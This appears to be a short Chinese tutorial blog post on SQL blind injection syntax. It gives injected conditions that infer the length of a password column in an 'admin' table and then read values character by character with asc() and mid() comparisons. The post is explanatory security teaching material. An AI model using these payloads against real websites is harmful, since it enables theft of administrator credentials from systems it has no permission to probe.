关于sql盲注语法


本文摘自PHP中文网,作者藏色散人,侵删。

如果页面没有显错数字,则用盲注语法根据页面变化来判断数据内容

获取数据长度:

1

2

3

and (select top 1 len(列名) from 表名)>5

and (select top 1 len(password) from admin)>16//错误

and (select top 1 len(password) from admin)>15//正常

获取指定位数的数据:

1

2

3

and (select top 1 asc(mid(列名,位置,1)) from 表名)>97

and (select top 1 asc(mid(admin,1,1)) from admin)>96//判断admin字段的内容第一位的ascii码值大于96 正常

and (select top 1 asc(mid(admin,1,1)) from admin)>97//判断admin字段的内容第一位的ascii码值大于97 错误 说明就是97

1

2

mid(字符串,截取的位置,截取字符数)

asc() //将字符转换成ascii码 方便进行比较

推荐:《mysql视频教程》

以上就是关于sql盲注语法的详细内容,更多文章请关注木庄网络博客

相关阅读 >>

实例讲解mysql 慢查询

sql数据库日志已满解决方法

oracle与sql server在企业应用的比较

mysql 字段as详解及实例代码

sql server高并发生成唯一订单号

mssql2005 insert,update,delete 之output子句使用实例

android学习笔记-保存数据到sql数据库中(saving data in sql databases)

oracle实现动态sql的拼装要领

sql server优化50法汇总

mysql的常用命令集锦

更多相关阅读请进入《sql》频道 >>


数据库系统概念 第6版
书籍

数据库系统概念 第6版

机械工业出版社

本书主要讲述了数据模型、基于对象的数据库和XML、数据存储和查询、事务管理、体系结构等方面的内容。



打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

评论

管理员已关闭评论功能...